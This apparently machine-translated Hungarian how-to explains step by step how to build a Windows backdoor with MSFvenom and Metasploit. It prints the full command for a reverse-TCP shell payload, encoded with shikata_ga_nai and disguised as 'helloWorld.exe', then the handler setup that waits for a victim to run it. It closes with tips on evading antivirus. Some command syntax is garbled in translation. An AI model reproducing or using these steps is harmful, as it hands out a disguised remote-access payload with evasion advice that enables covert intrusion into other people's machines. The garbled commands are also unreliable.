A hátsó ajtót a biztonsági mechanizmusok megkerülésére használják, gyakran titokban és többnyire észlelhetetlenül. Az MSFvenom, az msfpayload és az msfencode kombinációja segítségével létrehozhat egy hátsó ajtót, amely visszakapcsolja a támadót a fordított héj TCP használatával. A hátsó ajtó kifejlesztéséhez meg kell változtatnia a rosszindulatú program aláírását, hogy elkerülje a víruskereső szoftvereket. Fejezze be ezt a projektet egy pár számítógépen, amelyekhez hozzáférési engedéllyel rendelkezik, és közben többet megtudhat a számítógépek biztonságáról és az ilyen hátsó ajtók működéséről.
Lépések
1. lépés Indítsa el a Kali alkalmazást, és indítsa el a terminálkonzolt
2. lépés. Az interfész megjelenítéséhez írja be az ifconfig parancsot, és ellenőrizze IP -címét
3. lépés. A kódolók listájának megjelenítéséhez írja be az msfvenom -l kódolókat
Az x86/shikata_ga_nai kódolót fogja használni
4. lépés. Írja be: "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 --platform windows a használandó architektúrát jelöli ki.
- -p windows/shell/reverse_tcp kijelöli a beágyazandó hasznos terheket.
- Az LHOST a hallgató IP -címét jelöli.
- Az LPORT a figyelő portot jelöli.
- -b "\ x00" jelzi a rossz karakter (null bájt) elkerülését.
- -e x86/shikata_ga_nai jelöli a kódolók nevét.
- -f exe> helloWorld.exe a formátum kimenetét jelöli.
5. lépés: A Metasploit aktiválásához írja be az msfconsole parancsot
Most létrehozta a hátsó ajtót. Amikor az áldozat rákattint a helloWorld.exe fájlra, a beágyazott shell hasznos terhelés aktiválódik, és visszakapcsolja a rendszert. A kapcsolat fogadásához meg kell nyitnia a Metasploit-ban a multi-kezelőt, és be kell állítania a hasznos terheléseket
6. lépés. Írja be a use exploit/multi/handler parancsot
7. lépés. Írja be a set payload windows/shell/reverse_tcp parancsot
Lépés 8. Írja be a show options lehetőséget a modul ellenőrzéséhez
9. lépés. Írja be az LHOST készletet 192.168.48.129
Az "LHOST" a hallgató IP -címét jelöli
10. lépés. Írja be az LPORT 4444 szettet
Az "LPORT" jelzi a figyelő portot
11. lépés. Írja be a Run parancsot, és várja meg a kapcsolatot az áldozat gépéről
12. lépés. Várja meg, amíg az áldozat rákattint a helloWorld.exe fájlra
Ezután sikeresen csatlakozik az áldozat gépéhez.
Tippek
- Az -i használata az MSFvenomban reprezentálja a kódolást. Néha több iteráció segíthet elkerülni az AV szoftvert.
- Megtanulta, hogyan kell előállítani a hátsó ajtót és kódolni az MSFvenom használatával, de ez a módszer manapság nem fog tökéletesen működni egyes AV szoftverek ellen. Ennek oka az MSFvenom végrehajtási sablonjai miatt van. Az AV -gyártók hozzáadták a sablonok statikus aláírását, és csak keresik őket. A probléma megoldása más végrehajtási sablon vagy más eszközök használata.